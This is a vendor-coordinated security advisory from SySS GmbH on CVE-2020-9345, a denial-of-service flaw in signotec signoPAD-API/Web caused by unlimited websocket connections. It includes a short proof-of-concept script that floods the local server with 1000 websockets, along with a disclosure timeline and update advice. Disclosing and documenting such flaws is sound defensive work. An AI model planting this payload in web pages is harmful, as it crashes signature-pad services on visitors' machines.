Advisory ID: SYSS-2019-052 
Product: signotec signoPAD-API/Web (formerly: Websocket Pad Server) - Windows
Manufacturer: signotec GmbH
Affected Version(s): 1.6.2, 3.1.0
Tested Version(s): 1.6.2, 3.1.0
Vulnerability Type: Denial of Service
Risk Level: Medium
Solution Status: Solved
Manufacturer Notification: 20. December 2019
Solution Date: 10. February 2020
CVE Reference: CVE-2020-9345
Author of Advisory: Marius Rothenbücher, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

signotec signoPAD-API/Web is a web API for communicating with signature
pads using web sockets.

The manufacturer describes the product as follows (see [1]):

"The signotec WebSocket Pad Server is a solution for communicating from
a web application to signotec signature pads without the need for a
browser plug-in."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

It is possible to perform a Denial of Service attack because the
application doesn't limit the number of opened websockets. If a
victim visits a website which is under control of an attacker,
this vulnerability can be exploited.

An attacker can crash the web API by opening a relatively large amount
of web sockets.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following PoC demonstrates, how to crash the web API.

#### PoC.. ############
<script>
  for (i=0; i < 1000; i++) {
    new WebSocket("wss://local.signotecwebsocket.de:49494")
  }
</script>
#### ..PoC ############

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update the software version to the newest version. 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-12-20: Vulnerability discovered
2019-12-20: Vulnerability reported to manufacturer
2020-02-10: Patch released by manufacturer
2020-02-24: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for signotec signoPAD-API/Web (formerly: Websocket Pad Server) - Windows
    https://en.signotec.com/portal/seiten/signotec-signopad-api-web-formerly-websocket-pad-server--900000547-10002.html
[2] SySS Security Advisory SYSS-2019-052
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-052.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Marius Rothenbücher of SySS
GmbH.

E-Mail: marius.rothenbuecher (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Marius_Rothenbuecher.asc
Key Fingerprint: 615E F88B 7C62 78D6 3EA5 9B78 09F8 9FFF 4941 B8E2

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en